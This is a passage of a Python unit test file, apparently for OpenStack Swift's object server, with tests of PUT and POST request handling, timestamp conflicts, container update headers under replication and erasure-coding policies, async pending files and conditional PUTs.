# Same timestamp should result in 409
req = Request.blank('/sda1/p/a/c/o',
environ={'REQUEST_METHOD': 'POST'},
headers={'X-Timestamp': orig_timestamp,
'X-Object-Meta-3': 'Three',
'X-Object-Meta-4': 'Four',
'Content-Encoding': 'gzip',
'Content-Type': 'application/x-test'})
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 409)
self.assertEqual(resp.headers['X-Backend-Timestamp'], orig_timestamp)
# Earlier timestamp should result in 409
timestamp = normalize_timestamp(ts - 1)
req = Request.blank('/sda1/p/a/c/o',
environ={'REQUEST_METHOD': 'POST'},
headers={'X-Timestamp': timestamp,
'X-Object-Meta-5': 'Five',
'X-Object-Meta-6': 'Six',
'Content-Encoding': 'gzip',
'Content-Type': 'application/x-test'})
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 409)
self.assertEqual(resp.headers['X-Backend-Timestamp'], orig_timestamp)
def test_POST_conflicts_with_later_POST(self):
t_put = next(self.ts).internal
req = Request.blank('/sda1/p/a/c/o',
environ={'REQUEST_METHOD': 'PUT'},
headers={'X-Timestamp': t_put,
'Content-Length': 0,
'Content-Type': 'plain/text'})
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 201)
t_post1 = next(self.ts).internal
t_post2 = next(self.ts).internal
req = Request.blank('/sda1/p/a/c/o',
environ={'REQUEST_METHOD': 'POST'},
headers={'X-Timestamp': t_post2})
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 202)
req = Request.blank('/sda1/p/a/c/o',
environ={'REQUEST_METHOD': 'POST'},
headers={'X-Timestamp': t_post1})
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 409)
obj_dir = os.path.join(
self.testdir, 'sda1',
storage_directory(diskfile.get_data_dir(0), 'p',
hash_path('a', 'c', 'o')))
ts_file = os.path.join(obj_dir, t_post2 + '.meta')
self.assertTrue(os.path.isfile(ts_file))
meta_file = os.path.join(obj_dir, t_post1 + '.meta')
self.assertFalse(os.path.isfile(meta_file))
def test_POST_not_exist(self):
timestamp = normalize_timestamp(time())
req = Request.blank('/sda1/p/a/c/fail',
environ={'REQUEST_METHOD': 'POST'},
headers={'X-Timestamp': timestamp,
'X-Object-Meta-1': 'One',
'X-Object-Meta-2': 'Two',
'Content-Type': 'text/plain'})
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 404)
def test_POST_invalid_path(self):
timestamp = normalize_timestamp(time())
req = Request.blank('/sda1/p/a/c', environ={'REQUEST_METHOD': 'POST'},
headers={'X-Timestamp': timestamp,
'X-Object-Meta-1': 'One',
'X-Object-Meta-2': 'Two',
'Content-Type': 'text/plain'})
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 400)
def test_POST_no_timestamp(self):
req = Request.blank('/sda1/p/a/c/o',
environ={'REQUEST_METHOD': 'POST'},
headers={'X-Object-Meta-1': 'One',
'X-Object-Meta-2': 'Two',
'Content-Type': 'text/plain'})
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 400)
def test_POST_bad_timestamp(self):
req = Request.blank('/sda1/p/a/c/o',
environ={'REQUEST_METHOD': 'POST'},
headers={'X-Timestamp': 'bad',
'X-Object-Meta-1': 'One',
'X-Object-Meta-2': 'Two',
'Content-Type': 'text/plain'})
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 400)
def test_POST_container_connection(self):
# Test that POST does call container_update and returns success
# whether update to container server succeeds or fails
def mock_http_connect(calls, response, with_exc=False):
class FakeConn(object):
def __init__(self, calls, status, with_exc):
self.calls = calls
self.status = status
self.reason = 'Fake'
self.host = '1.2.3.4'
self.port = '1234'
self.with_exc = with_exc
def getresponse(self):
calls[0] += 1
if self.with_exc:
raise Exception('test')
return self
def read(self, amt=None):
return ''
return lambda *args, **kwargs: FakeConn(calls, response, with_exc)
ts = time()
timestamp = normalize_timestamp(ts)
req = Request.blank(
'/sda1/p/a/c/o', environ={'REQUEST_METHOD': 'PUT'},
headers={'X-Timestamp': timestamp,
'Content-Type': 'text/plain',
'Content-Length': '0'})
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 201)
req = Request.blank(
'/sda1/p/a/c/o',
environ={'REQUEST_METHOD': 'POST'},
headers={'X-Timestamp': normalize_timestamp(ts + 1),
'X-Container-Host': '1.2.3.4:0',
'X-Container-Partition': '3',
'X-Container-Device': 'sda1',
'X-Container-Timestamp': '1',
'Content-Type': 'application/new1'})
calls = [0]
with mock.patch.object(object_server, 'http_connect',
mock_http_connect(calls, 202)):
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 202)
req = Request.blank(
'/sda1/p/a/c/o',
environ={'REQUEST_METHOD': 'POST'},
headers={'X-Timestamp': normalize_timestamp(ts + 2),
'X-Container-Host': '1.2.3.4:0',
'X-Container-Partition': '3',
'X-Container-Device': 'sda1',
'X-Container-Timestamp': '1',
'Content-Type': 'application/new1'})
calls = [0]
with mock.patch.object(object_server, 'http_connect',
mock_http_connect(calls, 202, with_exc=True)):
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 202)
req = Request.blank(
'/sda1/p/a/c/o',
environ={'REQUEST_METHOD': 'POST'},
headers={'X-Timestamp': normalize_timestamp(ts + 3),
'X-Container-Host': '1.2.3.4:0',
'X-Container-Partition': '3',
'X-Container-Device': 'sda1',
'X-Container-Timestamp': '1',
'Content-Type': 'application/new2'})
calls = [0]
with mock.patch.object(object_server, 'http_connect',
mock_http_connect(calls, 500)):
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 202)
def _test_POST_container_updates(self, policy, update_etag=None):
# Test that POST requests result in correct calls to container_update
t = [next(self.ts) for _ in range(0, 5)]
calls_made = []
update_etag = update_etag or '098f6bcd4621d373cade4e832627b4f6'
def mock_container_update(ctlr, op, account, container, obj, request,
headers_out, objdevice, policy):
calls_made.append((headers_out, policy))
body = 'test'
headers = {
'X-Timestamp': t[1].internal,
'Content-Type': 'application/octet-stream;swift_bytes=123456789',
'X-Backend-Storage-Policy-Index': int(policy)}
if policy.policy_type == EC_POLICY:
# EC fragments will typically have a different size to the body and
# for small bodies the fragments may be longer. For this test all
# that matters is that the fragment and body lengths differ.
body = body + 'ec_overhead'
headers['X-Backend-Container-Update-Override-Etag'] = update_etag
headers['X-Backend-Container-Update-Override-Size'] = '4'
headers['X-Object-Sysmeta-Ec-Etag'] = update_etag
headers['X-Object-Sysmeta-Ec-Content-Length'] = '4'
headers['X-Object-Sysmeta-Ec-Frag-Index'] = 2
headers['Content-Length'] = str(len(body))
req = Request.blank('/sda1/p/a/c/o', body=body,
environ={'REQUEST_METHOD': 'PUT'},
headers=headers)
with mock.patch('swift.obj.server.ObjectController.container_update',
mock_container_update):
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 201)
self.assertEqual(1, len(calls_made))
expected_headers = HeaderKeyDict({
'x-size': '4',
'x-content-type': 'application/octet-stream;swift_bytes=123456789',
'x-timestamp': t[1].internal,
'x-etag': update_etag})
self.assertDictEqual(expected_headers, calls_made[0][0])
self.assertEqual(policy, calls_made[0][1])
# POST with no metadata newer than the data should return 409,
# container update not expected
calls_made = []
req = Request.blank(
'/sda1/p/a/c/o', environ={'REQUEST_METHOD': 'POST'},
headers={'X-Timestamp': t[0].internal,
'X-Backend-Storage-Policy-Index': int(policy)})
with mock.patch('swift.obj.server.ObjectController.container_update',
mock_container_update):
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 409)
self.assertEqual(resp.headers['x-backend-timestamp'],
t[1].internal)
self.assertEqual(0, len(calls_made))
# POST with newer metadata returns success and container update
# is expected
calls_made = []
req = Request.blank(
'/sda1/p/a/c/o', environ={'REQUEST_METHOD': 'POST'},
headers={'X-Timestamp': t[3].internal,
'X-Backend-Storage-Policy-Index': int(policy)})
with mock.patch('swift.obj.server.ObjectController.container_update',
mock_container_update):
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 202)
self.assertEqual(1, len(calls_made))
expected_headers = HeaderKeyDict({
'x-size': '4',
'x-content-type': 'application/octet-stream;swift_bytes=123456789',
'x-timestamp': t[1].internal,
'x-content-type-timestamp': t[1].internal,
'x-meta-timestamp': t[3].internal,
'x-etag': update_etag})
self.assertDictEqual(expected_headers, calls_made[0][0])
self.assertEqual(policy, calls_made[0][1])
# POST with no metadata newer than existing metadata should return
# 409, container update not expected
calls_made = []
req = Request.blank(
'/sda1/p/a/c/o', environ={'REQUEST_METHOD': 'POST'},
headers={'X-Timestamp': t[2].internal,
'X-Backend-Storage-Policy-Index': int(policy)})
with mock.patch('swift.obj.server.ObjectController.container_update',
mock_container_update):
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 409)
self.assertEqual(resp.headers['x-backend-timestamp'],
t[3].internal)
self.assertEqual(0, len(calls_made))
# POST with newer content-type but older metadata returns success
# and container update is expected newer content-type should have
# existing swift_bytes appended
calls_made = []
req = Request.blank('/sda1/p/a/c/o',
environ={'REQUEST_METHOD': 'POST'},
headers={
'X-Timestamp': t[2].internal,
'Content-Type': 'text/plain',
'Content-Type-Timestamp': t[2].internal,
'X-Backend-Storage-Policy-Index': int(policy)
})
with mock.patch('swift.obj.server.ObjectController.container_update',
mock_container_update):
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 202)
self.assertEqual(1, len(calls_made))
expected_headers = HeaderKeyDict({
'x-size': '4',
'x-content-type': 'text/plain;swift_bytes=123456789',
'x-timestamp': t[1].internal,
'x-content-type-timestamp': t[2].internal,
'x-meta-timestamp': t[3].internal,
'x-etag': update_etag})
self.assertDictEqual(expected_headers, calls_made[0][0])
self.assertEqual(policy, calls_made[0][1])
# POST with older content-type but newer metadata returns success
# and container update is expected
calls_made = []
req = Request.blank('/sda1/p/a/c/o',
environ={'REQUEST_METHOD': 'POST'},
headers={
'X-Timestamp': t[4].internal,
'Content-Type': 'older',
'Content-Type-Timestamp': t[1].internal,
'X-Backend-Storage-Policy-Index': int(policy)
})
with mock.patch('swift.obj.server.ObjectController.container_update',
mock_container_update):
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 202)
self.assertEqual(1, len(calls_made))
expected_headers = HeaderKeyDict({
'x-size': '4',
'x-content-type': 'text/plain;swift_bytes=123456789',
'x-timestamp': t[1].internal,
'x-content-type-timestamp': t[2].internal,
'x-meta-timestamp': t[4].internal,
'x-etag': update_etag})
self.assertDictEqual(expected_headers, calls_made[0][0])
self.assertEqual(policy, calls_made[0][1])
# POST with same-time content-type and metadata returns 409
# and no container update is expected
calls_made = []
req = Request.blank('/sda1/p/a/c/o',
environ={'REQUEST_METHOD': 'POST'},
headers={
'X-Timestamp': t[4].internal,
'Content-Type': 'ignored',
'Content-Type-Timestamp': t[2].internal,
'X-Backend-Storage-Policy-Index': int(policy)
})
with mock.patch('swift.obj.server.ObjectController.container_update',
mock_container_update):
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 409)
self.assertEqual(0, len(calls_made))
# POST with implicit newer content-type but older metadata
# returns success and container update is expected,
# update reports existing metadata timestamp
calls_made = []
req = Request.blank('/sda1/p/a/c/o',
environ={'REQUEST_METHOD': 'POST'},
headers={
'X-Timestamp': t[3].internal,
'Content-Type': 'text/newer',
'X-Backend-Storage-Policy-Index': int(policy)
})
with mock.patch('swift.obj.server.ObjectController.container_update',
mock_container_update):
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 202)
self.assertEqual(1, len(calls_made))
expected_headers = HeaderKeyDict({
'x-size': '4',
'x-content-type': 'text/newer;swift_bytes=123456789',
'x-timestamp': t[1].internal,
'x-content-type-timestamp': t[3].internal,
'x-meta-timestamp': t[4].internal,
'x-etag': update_etag})
self.assertDictEqual(expected_headers, calls_made[0][0])
self.assertEqual(policy, calls_made[0][1])
def test_POST_container_updates_with_replication_policy(self):
self._test_POST_container_updates(POLICIES[0])
def test_POST_container_updates_with_EC_policy(self):
self._test_POST_container_updates(
POLICIES[1], update_etag='override_etag')
def test_POST_container_updates_precedence(self):
# Verify correct etag and size being sent with container updates for a
# PUT and for a subsequent POST.
def do_test(body, headers, policy):
def mock_container_update(ctlr, op, account, container, obj, req,
headers_out, objdevice, policy):
calls_made.append((headers_out, policy))
calls_made = []
ts_put = next(self.ts)
# make PUT with given headers and verify correct etag is sent in
# container update
headers.update({
'Content-Type':
'application/octet-stream;swift_bytes=123456789',
'X-Backend-Storage-Policy-Index': int(policy),
'X-Object-Sysmeta-Ec-Frag-Index': 2,
'X-Timestamp': ts_put.internal,
'Content-Length': len(body)})
req = Request.blank('/sda1/p/a/c/o',
environ={'REQUEST_METHOD': 'PUT'},
headers=headers, body=body)
with mock.patch(
'swift.obj.server.ObjectController.container_update',
mock_container_update):
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 201)
self.assertEqual(1, len(calls_made))
expected_headers = HeaderKeyDict({
'x-size': '4',
'x-content-type':
'application/octet-stream;swift_bytes=123456789',
'x-timestamp': ts_put.internal,
'x-etag': 'expected'})
self.assertDictEqual(expected_headers, calls_made[0][0])
self.assertEqual(policy, calls_made[0][1])
# make a POST and verify container update has the same etag
calls_made = []
ts_post = next(self.ts)
req = Request.blank(
'/sda1/p/a/c/o', environ={'REQUEST_METHOD': 'POST'},
headers={'X-Timestamp': ts_post.internal,
'X-Backend-Storage-Policy-Index': int(policy)})
with mock.patch(
'swift.obj.server.ObjectController.container_update',
mock_container_update):
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 202)
self.assertEqual(1, len(calls_made))
expected_headers.update({
'x-content-type-timestamp': ts_put.internal,
'x-meta-timestamp': ts_post.internal})
self.assertDictEqual(expected_headers, calls_made[0][0])
self.assertEqual(policy, calls_made[0][1])
# sanity check - EC headers are ok
headers = {
'X-Backend-Container-Update-Override-Etag': 'expected',
'X-Backend-Container-Update-Override-Size': '4',
'X-Object-Sysmeta-Ec-Etag': 'expected',
'X-Object-Sysmeta-Ec-Content-Length': '4'}
do_test('test ec frag longer than 4', headers, POLICIES[1])
# middleware overrides take precedence over EC/older overrides
headers = {
'X-Backend-Container-Update-Override-Etag': 'unexpected',
'X-Backend-Container-Update-Override-Size': '3',
'X-Object-Sysmeta-Ec-Etag': 'unexpected',
'X-Object-Sysmeta-Ec-Content-Length': '3',
'X-Object-Sysmeta-Container-Update-Override-Etag': 'expected',
'X-Object-Sysmeta-Container-Update-Override-Size': '4'}
do_test('test ec frag longer than 4', headers, POLICIES[1])
# overrides with replication policy
headers = {
'X-Object-Sysmeta-Container-Update-Override-Etag': 'expected',
'X-Object-Sysmeta-Container-Update-Override-Size': '4'}
do_test('longer than 4', headers, POLICIES[0])
# middleware overrides take precedence over EC/older overrides with
# replication policy
headers = {
'X-Backend-Container-Update-Override-Etag': 'unexpected',
'X-Backend-Container-Update-Override-Size': '3',
'X-Object-Sysmeta-Container-Update-Override-Etag': 'expected',
'X-Object-Sysmeta-Container-Update-Override-Size': '4'}
do_test('longer than 4', headers, POLICIES[0])
def _test_PUT_then_POST_async_pendings(self, policy, update_etag=None):
# Test that PUT and POST requests result in distinct async pending
# files when sync container update fails.
def fake_http_connect(*args):
raise Exception('test')
device_dir = os.path.join(self.testdir, 'sda1')
t_put = next(self.ts)
update_etag = update_etag or '098f6bcd4621d373cade4e832627b4f6'
put_headers = {
'X-Trans-Id': 'put_trans_id',
'X-Timestamp': t_put.internal,
'Content-Type': 'application/octet-stream;swift_bytes=123456789',
'Content-Length': '4',
'X-Backend-Storage-Policy-Index': int(policy),
'X-Container-Host': 'chost:cport',
'X-Container-Partition': 'cpartition',
'X-Container-Device': 'cdevice'}
if policy.policy_type == EC_POLICY:
put_headers.update({
'X-Object-Sysmeta-Ec-Frag-Index': '2',
'X-Backend-Container-Update-Override-Etag': update_etag,
'X-Object-Sysmeta-Ec-Etag': update_etag})
req = Request.blank('/sda1/p/a/c/o',
environ={'REQUEST_METHOD': 'PUT'},
headers=put_headers, body='test')
with mock.patch('swift.obj.server.http_connect', fake_http_connect), \
mock.patch('swift.common.utils.HASH_PATH_PREFIX', ''), \
fake_spawn():
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 201)
async_pending_file_put = os.path.join(
device_dir, diskfile.get_async_dir(policy), 'a83',
'06fbf0b514e5199dfc4e00f42eb5ea83-%s' % t_put.internal)
self.assertTrue(os.path.isfile(async_pending_file_put),
'Expected %s to be a file but it is not.'
% async_pending_file_put)
expected_put_headers = {
'Referer': 'PUT http://localhost/sda1/p/a/c/o',
'X-Trans-Id': 'put_trans_id',
'X-Timestamp': t_put.internal,
'X-Content-Type': 'application/octet-stream;swift_bytes=123456789',
'X-Size': '4',
'X-Etag': '098f6bcd4621d373cade4e832627b4f6',
'User-Agent': 'object-server %s' % os.getpid(),
'X-Backend-Storage-Policy-Index': '%d' % int(policy)}
if policy.policy_type == EC_POLICY:
expected_put_headers['X-Etag'] = update_etag
self.assertDictEqual(
pickle.load(open(async_pending_file_put)),
{'headers': expected_put_headers,
'account': 'a', 'container': 'c', 'obj': 'o', 'op': 'PUT'})
# POST with newer metadata returns success and container update
# is expected
t_post = next(self.ts)
post_headers = {
'X-Trans-Id': 'post_trans_id',
'X-Timestamp': t_post.internal,
'Content-Type': 'application/other',
'X-Backend-Storage-Policy-Index': int(policy),
'X-Container-Host': 'chost:cport',
'X-Container-Partition': 'cpartition',
'X-Container-Device': 'cdevice'}
req = Request.blank('/sda1/p/a/c/o',
environ={'REQUEST_METHOD': 'POST'},
headers=post_headers)
with mock.patch('swift.obj.server.http_connect', fake_http_connect), \
mock.patch('swift.common.utils.HASH_PATH_PREFIX', ''), \
fake_spawn():
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 202)
self.maxDiff = None
# check async pending file for PUT is still intact
self.assertDictEqual(
pickle.load(open(async_pending_file_put)),
{'headers': expected_put_headers,
'account': 'a', 'container': 'c', 'obj': 'o', 'op': 'PUT'})
# check distinct async pending file for POST
async_pending_file_post = os.path.join(
device_dir, diskfile.get_async_dir(policy), 'a83',
'06fbf0b514e5199dfc4e00f42eb5ea83-%s' % t_post.internal)
self.assertTrue(os.path.isfile(async_pending_file_post),
'Expected %s to be a file but it is not.'
% async_pending_file_post)
expected_post_headers = {
'Referer': 'POST http://localhost/sda1/p/a/c/o',
'X-Trans-Id': 'post_trans_id',
'X-Timestamp': t_put.internal,
'X-Content-Type': 'application/other;swift_bytes=123456789',
'X-Size': '4',
'X-Etag': '098f6bcd4621d373cade4e832627b4f6',
'User-Agent': 'object-server %s' % os.getpid(),
'X-Backend-Storage-Policy-Index': '%d' % int(policy),
'X-Meta-Timestamp': t_post.internal,
'X-Content-Type-Timestamp': t_post.internal,
}
if policy.policy_type == EC_POLICY:
expected_post_headers['X-Etag'] = update_etag
self.assertDictEqual(
pickle.load(open(async_pending_file_post)),
{'headers': expected_post_headers,
'account': 'a', 'container': 'c', 'obj': 'o', 'op': 'PUT'})
# verify that only the POST (most recent) async update gets sent by the
# object updater, and that both update files are deleted
with mock.patch(
'swift.obj.updater.ObjectUpdater.object_update') as mock_update, \
mock.patch('swift.obj.updater.dump_recon_cache'):
object_updater = updater.ObjectUpdater(
{'devices': self.testdir,
'mount_check': 'false'}, logger=debug_logger())
node = {'id': 1}
mock_ring = mock.MagicMock()
mock_ring.get_nodes.return_value = (99, [node])
object_updater.container_ring = mock_ring
mock_update.return_value = ((True, 1))
object_updater.run_once()
self.assertEqual(1, mock_update.call_count)
self.assertEqual((node, 99, 'PUT', '/a/c/o'),
mock_update.call_args_list[0][0][0:4])
actual_headers = mock_update.call_args_list[0][0][4]
# User-Agent is updated.
expected_post_headers['User-Agent'] = 'object-updater %s' % os.getpid()
self.assertDictEqual(expected_post_headers, actual_headers)
self.assertFalse(
os.listdir(os.path.join(
device_dir, diskfile.get_async_dir(policy))))
def test_PUT_then_POST_async_pendings_with_repl_policy(self):
self._test_PUT_then_POST_async_pendings(POLICIES[0])
def test_PUT_then_POST_async_pendings_with_EC_policy(self):
self._test_PUT_then_POST_async_pendings(
POLICIES[1], update_etag='override_etag')
def test_POST_quarantine_zbyte(self):
timestamp = normalize_timestamp(time())
req = Request.blank('/sda1/p/a/c/o', environ={'REQUEST_METHOD': 'PUT'},
headers={'X-Timestamp': timestamp,
'Content-Type': 'application/x-test'})
req.body = 'VERIFY'
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 201)
objfile = self.df_mgr.get_diskfile('sda1', 'p', 'a', 'c', 'o',
policy=POLICIES.legacy)
objfile.open()
file_name = os.path.basename(objfile._data_file)
with open(objfile._data_file) as fp:
metadata = diskfile.read_metadata(fp)
os.unlink(objfile._data_file)
with open(objfile._data_file, 'w') as fp:
diskfile.write_metadata(fp, metadata)
self.assertEqual(os.listdir(objfile._datadir)[0], file_name)
req = Request.blank(
'/sda1/p/a/c/o',
environ={'REQUEST_METHOD': 'POST'},
headers={'X-Timestamp': normalize_timestamp(time())})
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 404)
quar_dir = os.path.join(
self.testdir, 'sda1', 'quarantined', 'objects',
os.path.basename(os.path.dirname(objfile._data_file)))
self.assertEqual(os.listdir(quar_dir)[0], file_name)
def test_PUT_invalid_path(self):
req = Request.blank('/sda1/p/a/c', environ={'REQUEST_METHOD': 'PUT'})
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 400)
def test_PUT_no_timestamp(self):
req = Request.blank('/sda1/p/a/c/o', environ={'REQUEST_METHOD': 'PUT',
'CONTENT_LENGTH': '0'})
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 400)
def test_PUT_bad_timestamp(self):
req = Request.blank(
'/sda1/p/a/c/o', environ={'REQUEST_METHOD': 'PUT'},
headers={'X-Timestamp': 'bad'})
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 400)
def test_PUT_no_content_type(self):
req = Request.blank(
'/sda1/p/a/c/o', environ={'REQUEST_METHOD': 'PUT'},
headers={'X-Timestamp': normalize_timestamp(time()),
'Content-Length': '6'})
req.body = 'VERIFY'
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 400)
def test_PUT_invalid_content_type(self):
req = Request.blank(
'/sda1/p/a/c/o', environ={'REQUEST_METHOD': 'PUT'},
headers={'X-Timestamp': normalize_timestamp(time()),
'Content-Length': '6',
'Content-Type': '\xff\xff'})
req.body = 'VERIFY'
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 400)
self.assertTrue('Content-Type' in resp.body)
def test_PUT_no_content_length(self):
req = Request.blank(
'/sda1/p/a/c/o', environ={'REQUEST_METHOD': 'PUT'},
headers={'X-Timestamp': normalize_timestamp(time()),
'Content-Type': 'application/octet-stream'})
req.body = 'VERIFY'
del req.headers['Content-Length']
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 411)
def test_PUT_zero_content_length(self):
req = Request.blank(
'/sda1/p/a/c/o', environ={'REQUEST_METHOD': 'PUT'},
headers={'X-Timestamp': normalize_timestamp(time()),
'Content-Type': 'application/octet-stream'})
req.body = ''
self.assertEqual(req.headers['Content-Length'], '0')
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 201)
def test_PUT_bad_transfer_encoding(self):
req = Request.blank(
'/sda1/p/a/c/o', environ={'REQUEST_METHOD': 'PUT'},
headers={'X-Timestamp': normalize_timestamp(time()),
'Content-Type': 'application/octet-stream'})
req.body = 'VERIFY'
req.headers['Transfer-Encoding'] = 'bad'
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 400)
def test_PUT_if_none_match_star(self):
# First PUT should succeed
req = Request.blank(
'/sda1/p/a/c/o', environ={'REQUEST_METHOD': 'PUT'},
headers={'X-Timestamp': next(self.ts).normal,
'Content-Length': '6',
'Content-Type': 'application/octet-stream',
'If-None-Match': '*'})
req.body = 'VERIFY'
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 201)
# File should already exist so it should fail
req = Request.blank(
'/sda1/p/a/c/o', environ={'REQUEST_METHOD': 'PUT'},
headers={'X-Timestamp': next(self.ts).normal,
'Content-Length': '6',
'Content-Type': 'application/octet-stream',
'If-None-Match': '*'})
req.body = 'VERIFY'
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 412)
req = Request.blank('/sda1/p/a/c/o',
environ={'REQUEST_METHOD': 'DELETE'},
headers={'X-Timestamp': next(self.ts).normal})
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 204)
req = Request.blank(
'/sda1/p/a/c/o', environ={'REQUEST_METHOD': 'PUT'},
headers={'X-Timestamp': next(self.ts).normal,
'Content-Length': '6',
'Content-Type': 'application/octet-stream',
'If-None-Match': '*'})
req.body = 'VERIFY'
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 201)
def test_PUT_if_none_match(self):
# PUT with if-none-match set and nothing there should succeed
timestamp = normalize_timestamp(time())
req = Request.blank(
'/sda1/p/a/c/o', environ={'REQUEST_METHOD': 'PUT'},
headers={'X-Timestamp': timestamp,
'Content-Length': '6',
'Content-Type': 'application/octet-stream',
'If-None-Match': 'notthere'})
req.body = 'VERIFY'
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 201)
# PUT with if-none-match of the object etag should fail
timestamp = normalize_timestamp(time())
req = Request.blank(
'/sda1/p/a/c/o', environ={'REQUEST_METHOD': 'PUT'},
headers={'X-Timestamp': timestamp,
'Content-Length': '6',
'Content-Type': 'application/octet-stream',
'If-None-Match': '0b4c12d7e0a73840c1c4f148fda3b037'})
req.body = 'VERIFY'
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 412)
def test_PUT_if_none_match_but_expired(self):
inital_put = next(self.ts)
put_before_expire = next(self.ts)
delete_at_timestamp = int(next(self.ts))
time_after_expire = next(self.ts)
put_after_expire = next(self.ts)
delete_at_container = str(
delete_at_timestamp /
self.object_controller.expiring_objects_container_divisor *
self.object_controller.expiring_objects_container_divisor)
req = Request.blank(
'/sda1/p/a/c/o', environ={'REQUEST_METHOD': 'PUT'},
headers={'X-Timestamp': inital_put.normal,
'X-Delete-At': str(delete_at_timestamp),
'X-Delete-At-Container': delete_at_container,
'Content-Length': '4',
'Content-Type': 'application/octet-stream'})
req.body = 'TEST'
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 201)
# PUT again before object has expired should fail
req = Request.blank(
'/sda1/p/a/c/o', environ={'REQUEST_METHOD': 'PUT'},
headers={'X-Timestamp': put_before_expire.normal,
'Content-Length': '4',
'Content-Type': 'application/octet-stream',
'If-None-Match': '*'})
req.body = 'TEST'
with mock.patch("swift.obj.server.time.time",
lambda: float(put_before_expire.normal)):
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 412)
# PUT again after object has expired should succeed
req = Request.blank(
'/sda1/p/a/c/o', environ={'REQUEST_METHOD': 'PUT'},
headers={'X-Timestamp': put_after_expire.normal,
'Content-Length': '4',
'Content-Type': 'application/octet-stream',
'If-None-Match': '*'})
req.body = 'TEST'
with mock.patch("swift.obj.server.time.time",
lambda: float(time_after_expire.normal)):
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 201)
def test_PUT_common(self):
timestamp = normalize_timestamp(time())
req = Request.blank(
'/sda1/p/a/c/o', environ={'REQUEST_METHOD': 'PUT'},
headers={'X-Timestamp': timestamp,
'Content-Length': '6',
'Content-Type': 'application/octet-stream',
'x-object-meta-test': 'one',
'Custom-Header': '*',
'X-Backend-Replication-Headers':
'Content-Type Content-Length'})
req.body = 'VERIFY'
with mock.patch.object(self.object_controller, 'allowed_headers',
['Custom-Header']):
self.object_controller.allowed_headers = ['Custom-Header']
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 201)
objfile = os.path.join(
self.testdir, 'sda1',
storage_directory(diskfile.get_data_dir(POLICIES[0]),
'p', hash_path('a', 'c', 'o')),
utils.Timestamp(timestamp).internal + '.data')
self.assertTrue(os.path.isfile(objfile))
self.assertEqual(open(objfile).read(), 'VERIFY')
self.assertEqual(diskfile.read_metadata(objfile),
{'X-Timestamp': utils.Timestamp(timestamp).internal,
'Content-Length': '6',
'ETag': '0b4c12d7e0a73840c1c4f148fda3b037',
'Content-Type': 'application/octet-stream',
'name': '/a/c/o',
'X-Object-Meta-Test': 'one',
'Custom-Header': '*'})
def test_PUT_overwrite(self):
req = Request.blank(
'/sda1/p/a/c/o', environ={'REQUEST_METHOD': 'PUT'},
headers={'X-Timestamp': normalize_timestamp(time()),
'Content-Length': '6',
'Content-Type': 'application/octet-stream'})
req.body = 'VERIFY'
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 201)
sleep(.00001)
timestamp = normalize_timestamp(time())
req = Request.blank(
'/sda1/p/a/c/o', environ={'REQUEST_METHOD': 'PUT'},
headers={'X-Timestamp': timestamp,
'Content-Type': 'text/plain',
'Content-Encoding': 'gzip'})
req.body = 'VERIFY TWO'
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 201)
objfile = os.path.join(
self.testdir, 'sda1',
storage_directory(diskfile.get_data_dir(POLICIES[0]), 'p',
hash_path('a', 'c', 'o')),
utils.Timestamp(timestamp).internal + '.data')
self.assertTrue(os.path.isfile(objfile))
self.assertEqual(open(objfile).read(), 'VERIFY TWO')
self.assertEqual(diskfile.read_metadata(objfile),
{'X-Timestamp': utils.Timestamp(timestamp).internal,
'Content-Length': '10',
'ETag': 'b381a4c5dab1eaa1eb9711fa647cd039',
'Content-Type': 'text/plain',
'name': '/a/c/o',
'Content-Encoding': 'gzip'})
def test_PUT_overwrite_to_older_ts_success(self):
old_timestamp = next(self.ts)
new_timestamp = next(self.ts)
req = Request.blank(
'/sda1/p/a/c/o', environ={'REQUEST_METHOD': 'DELETE'},
